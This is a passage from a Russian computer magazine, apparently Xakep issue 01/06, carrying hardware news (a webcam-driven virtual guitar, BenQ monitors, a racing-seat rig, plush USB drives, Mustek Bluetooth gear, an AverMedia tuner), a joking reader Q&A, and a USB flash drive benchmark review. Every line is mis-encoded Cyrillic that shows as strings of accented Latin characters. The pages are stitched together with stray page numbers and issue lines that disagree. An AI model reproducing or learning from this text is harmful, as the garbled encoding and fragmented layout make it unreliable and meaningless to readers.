Òû íèêîãäà íå ìå÷òàë ñòàòü ðîê-çâåçäîé? ×òî, òû íå çíàåøü íè îäíîãî àêêîðäà? À, òàê ó òåáÿ äàæå ãèòàðû íåò? Íà ñàìîì äåëå íå âñå åùå ïîòåðÿíî. Ó íåñêîëüêèõ ñòóäåíòîâ èç Òåõíîëîãè÷åñêîãî óíèâåðñèòåòà â Õåëüñèíêè áûëà òî÷íî òàêàÿ æå ïðîáëåìà, à òóò åùå ïîòðåáîâàëîñü ñðî÷íî ñäàâàòü êóðñîâóþ ðàáîòó. Ïîýòîìó îíè ðåøèëè ðåàëèçîâàòü ìå÷òó ñâîåãî äåòñòâà. Òàê ïîÿâèëàñü íà ñâåò íàñòîÿùàÿ âèðòóàëüíàÿ ãèòàðà, äëÿ èãðû íà êîòîðîé òåáå ïîíàäîáèòñÿ ëèøü êîìïüþòåð, âåáêàìåðà è ïàðà ÿðêî-îðàíæåâûõ ïåð÷àòîê. Äëÿ ìóçèöèðîâàíèÿ íå ïîòðåáóåòñÿ äàæå íèêàêèõ ìóçûêàëüíûõ íàâûêîâ, òàê ÷òî äîñòàòî÷íî ïðîñòî âñòàòü ïåðåä êàìåðîé è èçîáðàæàòü ìàñòåðñêóþ èãðó.  ýòî âðåìÿ êîìïüþòåð áóäåò íåïðåðûâíî ñëåäèòü çà ÿðêèìè ïåð÷àòêàìè è ïîäáèðàòü ïîäõîäÿùèå àêêîðäû è ìàíåðó èãðû. Ïðè ýòîì ãèòàðó ìîæíî íàñòðîèòü êàê íà ñïîêîéíûå ìåëîäè÷íûå çâóêè, òàê è íà çâåðñêèé ðåâ.  äàëüíåéøèõ ïëàíàõ ôèíñêèõ ñòóäåíòîâ — ñîçäàíèå öåëîãî àíñàìáëÿ âèðòóàëüíûõ èíñòðóìåíòîâ (ãèòàð, áàðàáàíîâ è òàê äàëåå). Êñòàòè, áëàãîäàðÿ ñâîìó òâîðåíèþ ðåáÿòà íå òîëüêî óñïåøíî çàùèòèëè êóðñîâóþ, íî è ñòàëè äàæå ñðàâíèòåëüíî èçâåñòíûìè ó ñåáÿ íà ðîäèíå, íåñêîëüêî ðàç çàñâåòèâøèñü â íåñêîëüêèõ ôèíñêèõ ãàçåòàõ è æóðíàëàõ, à òàêæå íà ìåñòíîì òåëåâèäåíèè.


HARDNEWS

HITECHNEWS

ÒÐÀÍÑÔÎÐÌÅÐÛ BENQ

Ïîðà çàáûòü î òåõ ìîíèòîðàõ, ïîëîæåíèå êîòîðûõ ìîæíî ðåãóëèðîâàòü òîëüêî íàêëîíîì âïåðåä èëè íàçàä. Ýòî ñòàðî, ïðèìèòèâíî, íåóäîáíî è íåïðàêòè÷íî, íåïðåñòèæíî óæå, â êîíöå-òî êîíöîâ. Åñëè òû ñîãëàñåí ñ ýòèì, òî ïðèñìîòðèñü ê äâóì íîâûì ìîíèòîðàì îò BenQ: ìîäåëè FP72G +D è FP92G èìåþò ñïåöèàëüíóþ ïîäñòàâêó, ïîëîæåíèå êîòîðîé ìîæíî èçìåíÿòü êàê â âåðòèêàëüíîé, òàê è â ãîðèçîíòàëüíîé ïëîñêîñòÿõ, à åùå ðåãóëèðîâàòü ïî âûñîòå. Òàêæå ìîæíî èçìåíÿòü ïîëîæåíèå ýêðàíà: ñ îáû÷íîãî ðåæèìà íà ïîðòðåòíûé. Ýòî î÷åíü óäîáíî, îñîáåííî åñëè çà îäíèì ÏÊ ðàáîòàþò íåñêîëüêî ÷åëîâåê, êàæäûé èç êîòîðûõ õî÷åò íàñòðîèòü ìîíèòîð îïòèìàëüíî ïîä ñâîé ðîñò. Åñòåñòâåííî, ÷òî ïîäñòàâêîé äåëî íå îãðàíè÷èâàåòñÿ, ó ýòèõ ïàíåëåé èìååòñÿ ïîëíûé íàáîð ñîîòâåòñòâóþùèõ õàðàêòåðèñòèê. Ìîäåëü FP72G+D îáëàäàåò êîíòðàñòíîñòüþ 500:1, âðåìÿ îòêëèêà ìàòðèöû ñîñòàâëÿåò 8ìñ, à FP92G èìååò êîíòðàñòíîñòü 450:1, âðåìÿ îòêëèêà ìàòðèöû — 12ìñ. Îáà ìîíèòîðà èìåþò âîçìîæíîñòü öèôðîâîãî ïîäêëþ÷åíèÿ DVI.

ÏÐÎÊÀ×Ó Ñ ÂÅÒÅÐÊÎÌ

Êàê ïî÷óâñòâîâàòü ñåáÿ çà ðóëåì íàñòîÿùåãî áîëèäà â äîìàøíèõ óñëîâèÿõ? Êàíàäñêàÿ êîìïàíèÿ VRX Industries íàøëà îòâåò íà ýòîò âîïðîñ, âûïóñòèâ äëÿ èñòèííûõ ëþáèòåëåé âèðòóàëüíûõ ãîíîê êîìïëåêò ïîä íàçâàíèåì Virtual Racer Pro. Óñòðîéñòâî ñîñòîèò èç ñèäåíüÿ, ðóëÿ, ïåäàëåé è ìíîãîêàíàëüíîé àêóñòè÷åñêîé ñèñòåìû, çàêðåïëåííûõ íà óñòîé÷èâîì ñòàëüíîì êàðêàñå. Ñàìî ñîáîé, ñèäåíüå âçÿòî îò ðåàëüíîãî àâòîìîáèëÿ, è äëÿ ñîçäàíèÿ îùóùåíèé ìàêñèìàëüíî ïðèáëèæåííûõ ê ðåàëüíîñòè, óñòàíîâëåíî íà ñïåöèàëüíîé ïîäâåñêå, ïåðåäàþùåé íåðîâíîñòè äîðîãè. Êîìïëåêò ñîâìåñòèì ïðàêòè÷åñêè ñî âñåìè ñîâðåìåííûìè êîíñîëÿìè (PlayStation 2, Xbox, Xbox 360 è ò.ä.), è, êîíå÷íî, êîìïüþòåðîì. Åñòü òîëüêî îäíî «íî» — äàííîå óäîâîëüñòâèå ñòîèò áåç ìàëîãî 3 òûñÿ÷è åâðî, îäíàêî äëÿ òåõ, êîãî òàêèå ìåëî÷è íå ñìóùàþò, îñòàíåòñÿ ëèøü äîêóïèòü ïëàçìåííóþ ïàíåëü, ðàçìåðîì ñ ïîëñòåíû, è ïîëíîå ïîãðóæåíèå â âèðòóàëüíóþ ðåàëüíîñòü ãàðàíòèðîâàíî.

ÏÓØÈÑÒÛÉ ÔËÅØ Êàçàëîñü áû, òåìà USB-ôëåøåê ñåáÿ óæå ïðàêòè÷åñêè èñ÷åðïàëà, âðîäå áû âñå îðèãèíàëüíîå, ÷òî ìîæíî áûëî ïðèäóìàòü, óæå ïðèäóìàëè è âîïëîòèëè â æèçíü (÷åãî ñòîÿò õîòÿ áû ôëåøêè â ôîðìå îòðóáëåííûõ ïàëüöåâ). Âïðî÷åì, íåêîòîðûå ôèðìû âñå åùå ñïîñîáíû ïðîäåìîíñòðèðîâàòü íå÷òî íîâîå. Êîìïàíèÿ Imation âûïóñòèëà â ïðîäàæó ïðåçàáàâíûå ôëåø-áðåëêè, ñäåëàííûå â âèäå ïëþøåâûõ èãðóøåê. Óñòðîéñòâî âûïóñêàåòñÿ â òðåõ âàðèàíòàõ: ñîáàêà, êðîêîäèë è áåãåìîò. Âñå ñìîòðÿòñÿ îäèíàêîâî êëåâî, è äàæå ñëîæíî ñêàçàòü, êîìó èç íèõ îòäàòü ïðåäïî÷òåíèå. Óâû, æåëåçíàÿ íà÷èíêà íà ôîíå âíåøíåãî èñïîëíåíèÿ âûãëÿäèò äîâîëüíî áëåêëî: åìêîñòü ñîñòàâëÿåò âñåãî 128 Ìá, íî õîòü USB 2.0 ïîääåðæèâàåòñÿ. Ïîêà äåâàéñ ïðîäàåòñÿ òîëüêî â ßïîíèè, äà è öåíà íà íåãî âåñüìà çàâûøåíà (ïðèìåðíî 42 âå÷íîçåëåíûõ åíîòà). Îäíàêî åñëè ôëåøêè äîáåðóòñÿ äî Ðîññèè, è öåíà ïîíèçèòñÿ äî àäåêâàòíîé ïëàíêè, òî èõ ìîæíî áóäåò ïîðåêîìåíäîâàòü â êà÷åñòâå îòëè÷íîãî ïîäàðêà êàê äåòÿì, òàê è âçðîñëûì.

14

XÀÊÅÐ 01 /85/ 06


HARDNEWS

ÑÈÍÈÅ ÇÓÁÊÈ MUSTEK Ïîìíèøü, êàêèìè ñòðàøíûìè ïîñëåäñòâèÿìè òåáÿ ïóãàëè â äåòñòâå, êîãäà òû îòêàçûâàëñÿ ÷èñòèòü çóáû? È âûïàäóò îíè, è ïî÷åðíåþò è…äàæå âñïîìèíàòü ñòðàøíî, ÷òî ïðèäóìûâàëè ðîäèòåëè, çàñòàâëÿÿ òåáÿ ïîëüçîâàòüñÿ ùåòêîé è ïàñòîé. Òû âûðîñ è ïîíÿë, ÷òî åñëè íå ïðèìåíÿòü ïàñòó ïî îòíîøåíèþ ê êîìïüþòåðó, òî ó íåãî âûðàñòóò ñèíèå çóáû! Íàïðèìåð, ïðîèçâîäñòâà Mustek. Ýòà êîìïàíèÿ ïðåäñòàâèëà ñðàçó íåñêîëüêî Bluetooth-óñòðîéñòâ. Áàçîâîå – ýòî ñîîòâåòñòâóþùèé àäàïòåð, áåç êîòîðîãî íè÷åãî íå ïîëó÷èòñÿ. Èçäåëèå Mustek MBT-D120 ïîääåðæèâàåò ñòàíäàðò ñèíèõ çóáîê âåðñèè 1.2, âûãëÿäèò ñòèëüíî è îáåñïå÷èâàåò ñâÿçü â ðàäèóñå 10 ì îò ñåáÿ. Íî àäàïòåðîì ñåãîäíÿ íèêîãî îñîáî íå óäèâèøü, à âîò ãàðíèòóðêà – ýòî óæå èíòåðåñíåå. Âûïîëíåííàÿ â êëàññè÷åñêîì ñòèëå Mustek MBT-H120 ìîæåò íîñèòüñÿ íà ëþáîì óõå è îáåùàåò ïðîðàáîòàòü 5,5 ÷àñîâ â ðåæèìå ðàçãîâîðà è 100 ÷àñîâ â ðåæèìå îæèäàíèÿ. Ïåðåçàðÿäêà àêêóìóëÿòîðà äëèòñÿ 2 ÷àñà. Êà÷åñòâî è ÷èñòîòó çâóêà ïðîèçâîäèòåëü ñðàâíèâàåò ñ àíàëîãè÷íûìè ïàðàìåòðàìè âîäû èç ãîðíîãî ðó÷åéêà.

AVERTV Â ÒÂÎÅÌ ÏÊ

Òû íèêîãäà íå ëþáèë ñìîòðåòü òåëåâèçîð, ïîòîìó ÷òî çà íåãî âñåãäà øëà ñåìåéíàÿ áèòâà: ïàïà ðåøàë ïîñìîòðåòü ôóòáîë, ìëàäøèé áðàò — ìóëüòèêè, ñåñòðåíêà ïîíèìàëà, ÷òî åñëè èìåííî ñåé÷àñ íå ïîñìîòðèò êîíöåðò Àëåêñû, òî ñîéäåò ñ óìà, à ìàìà ñ áàáóøêîé äîëæíû áûëè áûòü â êóðñå ñîáûòèé î÷åðåäíîãî ñåðèàëà. Êîðî÷å, áèòâà íàðîäîâ. Åñëè ýòî òàê, òî òåáå ïîòðåáóåòñÿ óñòðîéñòâî AverMedia PVR, è ïîñëå óñòàíîâêè åãî â ñâîé êîìïüþòåð òû ìîæåøü ñìåëî çàïèðàòüñÿ â êîìíàòå è íè îò êîãî íå çàâèñåòü â ïëàíå ðàçâëå÷åíèé è äîñòóïà ê èíôîðìàöèè. Âñå äåëî â òîì, ÷òî ýòî íå ïðîñòîé ÒÂ-òþíåð, à î÷åíü ôóíêöèîíàëüíûé. Êñòàòè, íå òîëüêî ÒÂ, íî è FM-ðàäèî òîæå î÷åíü õîðîøî ëîâèò. Ãëàâíàÿ îñîáåííîñòü óñòðîéñòâà – ýòî âñòðîåííûé àïïàðàòíûé äåêîäåð MPEG-2, êîòîðûé ñóùåñòâåííî ñíèæàåò íàãðóçêó íà ïðîöåññîð è îáåñïå÷èâàåò êà÷åñòâåííóþ êàðòèíêó. Îõîòó êàê íà ÒÂ, òàê è íà ðàäèîñèãíàë îí ìîæåò âåñòè â ðåàëüíîì âðåìåíè, à ìîæåò è ïî çàðàíåå ñîñòàâëåííîìó ðàñïèñàíèþ. Êðîìå çâóêà è èçîáðàæåíèÿ, AVerTV PVR ðàáîòàåò è ñ òåëåòåêñòîì. XÀÊÅÐ 01 /85/ 06


Äîáðîãî âðåìåíè ñóòîê, óâàæàåìûå! ß, ìóæ÷èíà â ñàìîì ðàñöâåòå òðóõè â ãîëîâå, ðåùèë íàïèñàòü âàì, äîðîãèå, ïèñüìåöî. Äàæå áîëåçíü ìîÿ (ý-ý-ý-ý-ý... êàê æå îíà íàçûâàåòñÿ?) íå îñòàíîâèëà ìåíÿ.  íàøè òÿæåëûå âðåìåíà ðåçêèõ ïåðåìåí íåîáõîäèìî ïîääåðæèâàòü Îòå÷åñòâî.  ñâÿçè ñ ýòèì ó ìåíÿ âîçíèêëà ìàññà âîïðîñîâ. Âîò íåêîòîðûå èç íèõ:

1 Êàêîãî ðàçìåðà ó NSD îáóâü, Íà 12 âîïðîñîâ îòâå÷àåò Àëåêñàíäð Ëîçîâñêèé

åñëè îí íàòÿãèâàåò ñòîëüêî íîñêîâ?

12

2 Ïî÷åìó Ôîðá ñàìûé çàêîíîïîñëóøíûé ãðàæäàíèí? 3 Ïîñëå ÷åãî Ãîðë ãèêîì ñòàë? 4 Ïðàâäà, ÷òî ó Ëîçîâñêîãî â î÷êè âñòðîåíà âèäåî- è ôîòîêàìåðà äëÿ çàïèñè ïðîõîäÿùèõ ìèìî?

5 Ïðàâäà-ëè, ÷òî Master-Lame-Master

íå óêàçûâàåò e-mail, ò.ê. íà ñàìîì äåëå ó íåãî åãî íåò?

6 Áóáëèê áûë â Òîëüÿòòè? 7 Ïðàâäà-ëè, ÷òî Êóòòà ñàìûé êðàñèâûé? 8 Ïðàâäà, ÷òî Íèêèòîç ñòàë îòëè÷íî ðàçáèðàòüñÿ

â ÏÕÏ ïîñëå òÿæåëîé ÷åðåïíîìîçãîâîé òðàâìû, ïåðåíåñåííîé èì äàëåêî â ãîðàõ Òèáåòà? 9 Ìàéíäâîðê äóìàåò äàæå âî ñíå (èëè îí íå ñïèò)? 10 Àíäðþøîê áèîìåõàíè÷åñêèé ðîáîò-çîìáè íà íèêñîâîé ïëàòôîðìå? 11 Õèíò ñäåëàë îãðîìíóþ ïàðòèþ ôåéêîâûõ äèñêîâ ê îäíîìó èç íîìåðîâ? 12 Àëèê Âàéíåð óøåë â øîóáèçíåñ ïîñëå òîãî, êàê åãî ôîòîãðàôèè çàìåòèëè â îäíîì èç íîìåðîâ?

* è íà çàñûïêó: ÷åì íà ñàìîì äåëå ìîæíî âûëå÷èòü ïðîñòóäèôèëèñ? Ñåêñ è àëêîãîëü òîëüêî óñèëèëè åå.

Ïðèâåò, ìóæ÷èíà! Íà ðåäêîñòü îñòðûå âîïðîñû òû çàäàë! Ìîæíî äàæå ñêàçàòü, ÷òî â ýòèõ âîïðîñàõ — êâèíòýññåíöèÿ âñåõ ÷èòàòåëüñêèõ âîïðîñîâ ïðîøëîãî óæå ãîäà. Ïîïðîáóþ îòâåòèòü òåáå ðàçâåðíóòî.

1 Ó NSD îáå íîãè — èç êðàñíîãî äåðåâà, ïðè÷åì ñòàðîãî îáðàçöà, â âèäå êîñòûëåé. Ïîýòîìó êàæäîå óòðî îí îäåâàåò íåñêîëüêî ïàð íîñêîâ, îáìàçûâàåò èõ ïëàñòèëèíîì è ïðåâðàùàåò â ïîäîáèå ÷åëîâå÷åñêèõ êîíå÷íîñòåé, ÷òîáû îäåâàòü îáû÷íóþ îáóâü. 2 Ïîòîìó ÷òî îí àñïèðàíò è åìó íå íàäî êîñèòü îò àðìèè. 3 Ïîñëå òîãî êàê ðàçîáðàë íà ÷àñòè ãàììà-äåôåêòîñêîï è ïîðÿäî÷íî îáëó÷èë ñâîé ìîçã èçëó÷åíèåì ðàäèîàêòèâíîãî èçîòîïà öåçèÿ. 4 Ó ìåíÿ â î÷êè âñòðîåíà íå îáû÷íàÿ êàìåðà, à ðåíòãåíîâñêàÿ. Ïîýòîìó, íàõîäÿñü â î÷êàõ, ÿ ìîãó ïðîñìàòðèâàòü íèçêîêà÷åñòâåííîå, ÷åðíî-áåëîå, íî ðåàëèñòè÷íîå ïîðíî. 5 Íà ñàìîì äåëå ó íåãî äàæå àñüêè íåò, ïîòîìó ÷òî îí åå óñòàíîâèòü íå ìîæåò. 6 Áûë, ðàáîòàë íà ÂÀÇå îêðàñ÷èêîì äâèãàòåëåé äî òåõ ïîð, ïîêà ìåíåäæåðû ÂÀÇà íå ïåðåñòàëè èõ êðàñèòü. 7 Ãû. 8 Âðàíüå, îí íèêîãäà íå âèäåë ãîð. Îí íåíàñòîÿùèé ãîðåö, ïðîñòî ïðèêèäûâàåòñÿ èì, ÷òîáû òîðãîâàòü á/ó êîìïüþòåðàìè íà ×åðêèçîâñêîì ðûíêå. 9 Äà, îí äóìàåò 24 ÷àñà â ñóòêè. Ïîýòîìó ÷àñòåíüêî çàäåðæèâàåò ñòàòüè. 10 ÄÀ! ÄÀ! Îí êðóòèòñÿ íà OpenBSD. 11 Íåò, îí íè÷åãî íå äåëàë. 12 Êòî-êòî? P.S. Òû òî÷íî õî÷åøü óçíàòü ìîé êîìïåòåíòíûé îòâåò ïðî ïðîñòóäó (common cold)? Èçâîëü ïðîñëóøàòü! Äåëî â òîì, ÷òî ïðè îáû÷íîé ïðîñòóäå íå ðåêîìåíäóåòñÿ ïðîòèâîâèðóñíîå ëå÷åíèå. Ñèìïòîìàòè÷åñêîå – ñåé÷àñ ìîäíî èñïîëüçîâàòü èïðàòðîïèóì áðîìèä â âèäå íàçàëüíîãî ñïðåÿ. Ïëåêîíàðèë â òàáëåòêàõ, ïðèíÿòûé â ïðåäåëàõ 24 ÷àñîâ ñ ìîìåíòà áîëåçíè, óìåíüøàåò ïðîäîëæèòåëüíîñòü áîëåçíè íà 1 äåíü, à êîìáèíàöèÿ èíòðàíàçàëüíîãî àëüôà-2b èíòåðôåðîíà ñ àíòèãèñòàìèííûìè ïðåïàðàòàìè ïåðâîé ãåíåðàöèè (çà ñ÷åò èõ ñîáñòâåííîãî õîëèíîëèòè÷åñêîãî äåéñòâèÿ, âòîðàÿ ãåíåðàöèÿ òóò íå ïîìîæåò) è èáóïðîôåíîì âûðàæåíî óìåíüøàåò ñèìïòîìû ïðîñòóäû. Êñòàòè, õî÷ó òåáÿ ðàññòðîèòü. Ïðåïàðàòû ýõèíàöåè, öèíêà è àñêîðáèíîâîé êèñëîòû ïî ñîâðåìåííûì ïðåäñòàâëåíèåì íåýôôåêòèâíû. Äîâîëåí ëè òû ìîèì îòâåòîì? :).

016

XÀÊÅÐ 01 /85/ 06


A-DATA BCD SMART 512MB SILICON POWER LUXMINI 310 256MB LG XSTICK MIRROR 2GB DIGMA USB FLASH DRIVE 256MB IMATION FLASH DRIVE MINI 256ÌB LG XSTICK ALUMINUM 2GB LG XSTICK PLATINUM 1GB SONY MICRO VAULT PLUS 256MB SONY MICRO VAULT 128MB KINGMAX MAXDRIVE I 512MB PQI INTELLIGENT STICK 512MB APACER HANDY STENO HT203 1GB

018

XÀÊÅÐ 01 /85/ 05


ÏÀÌßÒÜ Â ÊÀÐÌÀÍÅ òåñòèðîâàíèå âíåøíèõ USB-FLASH Íàêîïèòåëåé Øåõòìàí Àëåêñàíäð test_lab (test_lab@gameland.ru) Intro

Ðûíîê ôëåø-ïàìÿòè íå ñòîèò íà ìåñòå: ïðîèçâîäèòåëè âûïóñêàþò âñå áîëüøå è áîëüøå ðàçëè÷íûõ ìîäåëåé USB-íàêîïèòåëåé. Âîçðàñòàåò ñêîðîñòü çàïèñè, óìåíüøàåòñÿ èõ ðàçìåð è ñòîèìîñòü.  íàøåì òåñòå ìû ðàññìîòðèì î÷åðåäíóþ ïîäáîðêó òàêèõ íîñèòåëåé.

Òåõíîëîãèÿ

Äëÿ íà÷àëà ðàññìîòðèì ñòðîåíèå ýëåìåíòàðíîé ÿ÷åéêè. Åå îñíîâíîé ýëåìåíò — ñïåöèàëüíûé òðàíçèñòîð: ïîëåâîé òðàíçèñòîð ñ ïëàâàþùèì çàòâîðîì. Ïîñëåäíèé ïðåäñòàâëÿåò ñîáîé ýëåêòðîä, íèêàê íå ñîåäèíåííûé ñî ñõåìîé ïîäêëþ÷åíèÿ, òàê êàê îí ïîëíîñòüþ îãðàæäåí äèýëåêòðèêîì. Ïîìèìî íåãî, èìåþòñÿ åùå òðè ýëåêòðîäà: èñòîê, ñòîê è çàòâîð (îíè óæå ñîåäèíåíû ñî ñõåìîé). Ïðè ïîäà÷å íàïðÿæåíèÿ íà çàòâîð ÷àñòü ýëåêòðîíîâ, îáëàäàþùèõ äîñòàòî÷íî áîëüøîé ýíåðãèåé, ìîãóò ïðîéòè ñêâîçü äèýëåêòðèê (òóííåëèðîâàòü) è «îñåñòü» íà ïëàâàþùåì çàòâîðå. Òàê êàê ýòîò ïëàâàþùèé ýëåêòðîä íå ñîåäèíåí ãàëüâàíè÷åñêè ñ âíåøíåé ñðåäîé, òî ýëåêòðîíû ìîãóò íà íåì íàõîäèòñÿ ñêîëüêî óãîäíî, åñëè ó íåãî íàéäåòñÿ ýíåðãèè äëÿ ïðåîäîëåíèÿ èçîëèðóþùåãî ñëîÿ (ýòî îäèí èç íåñîìíåííûõ ïðåèìóùåñòâ FLASH-ïàìÿòè). Ïðè ýòîì äëÿ õðàíåíèÿ ýëåêòðîíîâ íà òðàíçèñòîð íå íàäî ïîäàâàòü íàïðÿæåíèå, à çíà÷èò ìû èìååì ýíåðãîíåçàâèñèìîñòü. Ïðè ýòîì íàõîäÿùèåñÿ íà ïëàâàþùåì çàòâîðå ýëåêòðîíû âëèÿþò íà ïðîõîæäåíèå òîêà ÷åðåç òðàíçèñòîð è, ñëåäîâàòåëüíî, ìû ìîæåì îï-

ðåäåëèòü, åñòü ëè îíè òàì èëè íåò. ×òîáû óáðàòü ýëåêòðîíû ñ ïëàâàþùåãî çàòâîðà, íåîáõîäèìî ïîäàòü íà çàòâîð íàïðÿæåíèå ïðîòèâîïîëîæíîãî çíàêà, ïîñëå ÷åãî ýëåêòðè÷åñêîå ïîëå ñîîáùèò ýëåêòðîíàì ýíåðãèþ, íåîáõîäèìóþ äëÿ ïðåîäîëåíèÿ ñëîÿ äèýëåêòðèêà, è îíè «ñòåêóò» âî âíåøíþþ öåïü. Òàêèì îáðàçîì, ó íàñ èìååòñÿ äâà ñîñòîÿíèÿ, à çíà÷èò, îäíà òàêàÿ ÿ÷åéêà ñïîñîáíà õðàíèòü îäèí áèò äàííûõ. Íî ýòèì âîçìîæíîñòè ÿ÷ååê íå îãðàíè÷èâàþòñÿ è â ñîâðåìåííûõ íîñèòåëÿõ ïðèìåíÿþòñÿ òàê íàçûâàåìûå MLC (multilevel cell — ìíîãîóðîâíåâàÿ ÿ÷åéêà). Çäåñü óæå ôèêñèðóåòñÿ íå íàëè÷èå èëè îòñóòñòâèå çàðÿäà íà ïëàâàþùåì çàòâîðå, à åãî óðîâåíü. Òàêèì îáðàçîì, â îäíîé ÿ÷åéêå ìîãóò õðàíèòñÿ íåñêîëüêî áèò èíôîðìàöèè. Ìíîãîóðîâíåâûå ÿ÷åéêè èìåþò êàê ïðåèìóùåñòâà: íèçêàÿ ñåáåñòîèìîñòü, áîëüøåé îáúåì ñîõðàíÿåìîé èíôîðìàöèè íà åäèíèöó ïëîùàäè, âîçìîæíîñòü ôîðìèðîâàíèÿìèêðîñõåì áîëüøîãî ðàçìåðà, òàê è íåäîñòàòêè: íàäåæíîñòü íèæå, ÷åì ó îäíîóðîâíåâûõ, áîëåå ñëîæíàÿ ñèñòåìà ÷òåíèÿ/çàïèñè, íå òàêîå âûñîêîå áûñòðîäåéñòâèå.

Ìåòîäèêà òåñòèðîâàíèÿ

Äëÿ òåñòèðîâàíèÿ èñïîëüçîâàëàñü èçâåñòíàÿ óòèëèòà Ziff Davis Media WinBench 99, êîòîðàÿ âûäàâàëà ñëåäóþùóþ èíôîðìàöèþ: âðåìÿ äîñòóïà ê èíôîðìàöèè â ìèëëèñåêóíäàõ, ñòåïåíü çàãðóçêè ïðîöåññîðà âî âðåìÿ ðàáîòû ôëåøêè â ïðîöåíòàõ, ãðàôèê çàâèñèìîñòè ñêîðîñòè ÷òåíèÿ/çàïèñè îò òîãî, ñ êàêîé îáëàñòüþ ïàìÿòè èäåò ðàáîòà. Òàê æå ôèêñèðîâàëèñü ñêîðîñòè ÷òåíèÿ/çàïèñè â íà÷àëå è

â êîíöå äèàïàçîíà. Ïîìèìî ýòîãî, îöåíèâàëèñü ýðãîíîìè÷åñêèå õàðàêòåðèñòèêè íîñèòåëåé è â îñîáåííîñòè èõ ðàçìåðû. Ýòî âàæíûé ïîêàçàòåëü, òàê êàê åñëè USB-ïîðòû ðàñïîëîæåíû î÷åíü áëèçêî äðóã îò äðóãà, òî áîëüøîé äåâàéñ ìîæåò ïîïðîñòó ïåðåêðûâàòü ñîñåäíèå èíòåðôåéñû. Òàê æå îòñìàòðèâàëèñü è ñïåöèôè÷åñêèå ïàðàìåòðû, õàðàêòåðíûå äëÿ êàæäîé ôëåøêè â îòäåëüíîñòè.

Ñîâåò

Õîòü ôëåøêè ïîääåðæèâàþò «ãîðÿ÷óþ» çàìåíó, íî âñå æå ðåêîìåíäóåòñÿ ïðåäâàðèòåëüíî çàâåðøàòü ðàáîòó ñ íèìè. Äëÿ ýòîãî â òðåå íàäî íàéòè èêîíêó «Safely Remove Hardware», çàòåì êëèêíóòü íà íåå ëåâîé êíîïêîé, âûáðàòü íåîáõîäèìûé äèñê è íàæàòü íà íåãî. Ïîñëå ýòîãî âñïëûâåò îêîøêî, ÷òî äåâàéñ ìîæåò áûòü èçâëå÷åí. Ýòî ïðîñòîå ïðàâèëî ìîæíî è íå ñîáëþäàòü, íî â ýòîì ñëó÷àå âåëèêà âåðîÿòíîñòü ïîòåðè äàííûõ.

Âûâîäû

Êàê âèäíî èç òåñòà, íà ðûíêå ïðåäñòàâëåíî òàêîå êîëè÷åñòâî íîñèòåëåé íà FLASH-ïàìÿòè, ÷òî ïî÷òè êàæäûé ïîëüçîâàòåëü ñìîæåò íàéòè ñåáå ïîäõîäÿùèé äåâàéñ. Çäåñü ìîæíî îðèåíòèðîâàòüñÿ íå òîëüêî íà îáúåì, íî è äàæå òàêèå ñóáúåêòèâíûå ïàðàìåòðû, êàê äèçàéí, ôèçè÷åñêèå ðàçìåðû è òàê äàëåå.

Òåñòîâûé ñòåíä

XÀÊÅÐ 01 /85/ 05

019

Ïðîöåññîð: AMD Athlon 64 2800+ Ïàìÿòü: 1256 Ìá Kingston Ìàòåðèíñêàÿ ïëàòà: Epox 8kda3i nForce 3 250GB Âèäåîêàðòà: Sapphire RADEON 9800PRO 128Ìá Æåñòêèé äèñê: 80Gb Seagate Barracuda IV test_lab âûðàæàåò áëàãîäàðíîñòü çà ïðåäîñòàâëåííîå íà òåñòèðîâàíèå îáîðóäîâàíèå êîìïàíèè: ìåæäóíàðîäíîå ðåêëàìíîå àãåíòñòâî Image Media, Àëüÿíñ (ò.(495)796-9356, www.alliancegroup.ru), NEOGROUP (www.neo.ru), ÀË-Öåíò Ìèêðîñèñòåìc (ò.(495)232-0281, www.ak-cent.ru), ÌÅÐËÈÎÍ (www.merlion.ru), à òàêæå ðîññèéñêèå ïðåäñòàâèòåëüñòâà êîìïàíèé Imation è LG.


2GB SiliconPower 256Mb LG LuxMini 310 Xstick Mirror

Digma USB 256MB Flash drive

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,375 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 4,54 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 15700 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 15900 Ðàçìåðû, ìì: 56.3x17x11.7

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,498 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 5,28 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 11400 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 11400 Ðàçìåðû, ìì: 63 x 20.6 x 7

Âðåìÿ äîñòóïà ê ïàìÿòè, ìñ: 0,748 Çàãðóçêà ïðîöåññîðà, äîëè îò åäèíèöû: 5,04 Èíäåêñ ïåðåäà÷è äàííûõ â íà÷àëå äèàïàçîíà, Êáàéò/ñ: 19300 Èíäåêñ ïåðåäà÷è äàííûõ â êîíöå äèàïàçîíà, Êáàéò/ñ: 19300 Ðàçìåðû, ìì: 70 x 16 x 8

$21

$141

$34

Ýòà ôëåøêà ñêîðåå ïîäîéäåò ïðåäñòàâèòåëüíèöàì æåíñêîãî ïîëà, òàê êàê èìååò íåáîëüøèå ðàçìåðû è ôîðìó, íàïîìèíàþùóþ ãóáíóþ ïîìàäó. Òåì íå ìåíåå ñêîðîñòíûå õàðàêòåðèñòèêè îñòàëèñü íà âûñîêîì óðîâíå: âðåìÿ äîñòóïà è èíäåêñû ïåðåäà÷è äàííûõ ïðèáëèæàþòñÿ ê ðåêîðäíûì ïîêàçàòåëÿì. Íà äèàãðàììå âèäåí ëèøü îäèí çàìåòíûé ñêà÷îê â ñêîðîñòè ÷òåíèÿ – îí ðàñïîëàãàåòñÿ â ñàìîì íà÷àëå äèàïàçîíà. Ðàñõîä ðåñóðñîâ ïðîöåññîðà òàêæå âåñüìà íåâåëèê. Êîðïóñ ñëåãêà ñóæàåòñÿ áëèæå ê ðàçúåìó, ÷òî îáëåã÷àåò óñòàíîâêó ôëåø-íàêîïèòåëÿ, êîãäà ïîðòû ðàñïîëîæåíû áëèçêî äðóã ê äðóãó.

